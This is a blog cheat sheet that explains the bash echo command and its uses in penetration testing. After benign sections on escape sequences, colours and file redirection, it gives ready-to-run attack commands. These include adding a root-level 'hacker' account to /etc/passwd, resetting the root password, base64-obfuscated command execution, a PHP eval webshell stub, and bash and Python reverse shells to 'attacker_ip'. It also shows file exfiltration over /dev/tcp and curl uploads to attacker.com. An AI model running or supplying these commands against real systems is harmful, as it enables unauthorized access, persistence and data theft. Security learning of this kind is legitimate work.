KUNO
kuno
August 24, 2025
30 Views
Welcome

Echo Command Explained and Penetration Testing Applications

This article delves into the various applications of the Echo command in penetration testing, including basic options, color output, formatted output, file manipulation, string display, IP forwarding, user management, password modification, command execution, Base64 encoding, reverse shell, and file transfer techniques. The article covers common usages of the Echo command and its application scenarios in real-world penetration testing, making it ideal for security enthusiasts and penetration testers.

Echo in Penetration Testing

Common Echo Options

Basic Options

bash
1# -n: Do not output the trailing newline
2echo -n "Hello"  # Output: Hello
3echo "Hello"     # Output: Hello\n
4
5# -e: Enable interpretation of backslash escapes
6echo -e "Hello\nWorld"  # Output: Hello
7                        # World
8
9# -E: Disable interpretation of backslash escapes (default)
10echo -E "Hello\nWorld"  # Output: Hello\nWorld
11
12# Common escape sequences
13echo -e "\a"     # Bell
14echo -e "\b"     # Backspace
15echo -e "\c"     # No newline
16echo -e "\f"     # Form feed
17echo -e "\n"     # Newline
18echo -e "\r"     # Carriage return
19echo -e "\t"     # Horizontal tab
20echo -e "\v"     # Vertical tab
21echo -e "\\"     # Backslash

Color Output

bash
1# Text color
2echo -e "\033[31mRed text\033[0m"    # Red
3echo -e "\033[32mGreen text\033[0m"    # Green
4echo -e "\033[33mYellow text\033[0m"    # Yellow
5echo -e "\033[34mBlue text\033[0m"    # Blue
6echo -e "\033[35mPurple text\033[0m"    # Purple
7echo -e "\033[36mCyan text\033[0m"    # Cyan
8
9# Background color
10echo -e "\033[41mRed background\033[0m"    # Red background
11echo -e "\033[42mGreen background\033[0m"    # Green background
12echo -e "\033[43mYellow background\033[0m"    # Yellow background
13
14# Text style
15echo -e "\033[1mBold text\033[0m"     # Bold
16echo -e "\033[4mUnderlined text\033[0m"   # Underlined
17echo -e "\033[5mBlink text\033[0m"     # Blink

Formatted Output

bash
1# Using variables
2name="World"
3echo "Hello $name"      # Output: Hello World
4echo "Hello ${name}"    # Output: Hello World
5
6# Command substitution
7echo "Current time: $(date)"
8echo "Current time: `date`"
9
10# Escaping special characters
11echo "This is a \$dollar sign"    # Output: This is a $dollar sign
12echo "This is a \"quote\""        # Output: This is a "quote"

File Operation Options

bash
1# Append to file
2echo "new line" >> file.txt
3
4# Overwrite file
5echo "new content" > file.txt
6
7# Create multiline file
8echo -e "line1\nline2\nline3" > multiline.txt
9
10# Using here document
11echo << EOF > file.txt
12line1
13line2
14line3
15EOF

Echo Display String

bash
1echo "Hello ICTRUN"
2 Hello ICTRUN
3
4echo "$str" Good Evening 
5 Good Evening

Enable ipv4 ipforward

bash
1echo 1 > /proc/sys/net/ipv4/ip_forward

Add a root-level user

bash
1echo "hacker:$(openssl passwd -1 -salt 'salt' 'password'):0:0::/:/bin/bash" >> /etc/passwd

Modify root password

bash
1echo "root:newpassword" | chpasswd

Non-interactive password change using echo -e

bash
1echo -e "newpassword\nnewpassword" | passwd username

Execute command with base64

bash
1echo "whoami" | base64
2echo "d2hvYW1pCg==" | base64 -d | bash

Write a one-line PHP to 1.php using Base64

bash
1echo "<?php eval(base64_decode('ZWNobyAiSGVsbG8gV29ybGQiOw==')); ?>" > 1.php

Reverse Shell

bash
1# Bash reverse shell
2echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" | bash
3
4# Python reverse shell
5echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker_ip\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'" | bash

File Operations

bash
1# Create file
2echo "content" > file.txt
3
4# Append content
5echo "more content" >> file.txt
6
7# Clear file
8echo "" > file.txt

Environment Variable Operations

bash
1# Set environment variable
2echo "export PATH=/new/path:$PATH" >> ~/.bashrc
3
4# Add proxy settings
5echo "export http_proxy=http://proxy:port" >> ~/.bashrc

System Configuration Modification

bash
1# Modify system limits
2echo "* soft nofile 65535" >> /etc/security/limits.conf
3
4# Modify kernel parameters
5echo "net.ipv4.tcp_syncookies = 1" >> /etc/sysctl.conf

File Transfer

Sending Files

bash
1# Method 1: Using nc
2export LFILE=/tmp/1.tar.gz
3bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/1.1.1.1/4422'
4
5# Method 2: Using base64
6cat file.txt | base64 | echo "$(cat -)" > file.txt.b64

Receiving Files

bash
1# Method 1: Using nc
2nc -v -l -p 4422 > 1.tar.gz
3
4# Method 2: Using base64
5cat file.txt.b64 | base64 -d > file.txt

Other File Transfer Methods

bash
1# Upload file using curl
2echo "curl -F 'file=@/path/to/file' http://attacker.com/upload"
3
4# Download file using wget
5echo "wget http://attacker.com/file -O /path/to/save"

Enjoyed this article?

Share it with your friends and colleagues!

Welcome
Last updated: August 25, 2025
相关文章
正在检查服务状态...
Hello World - Welcome to My Blog - ICTRUN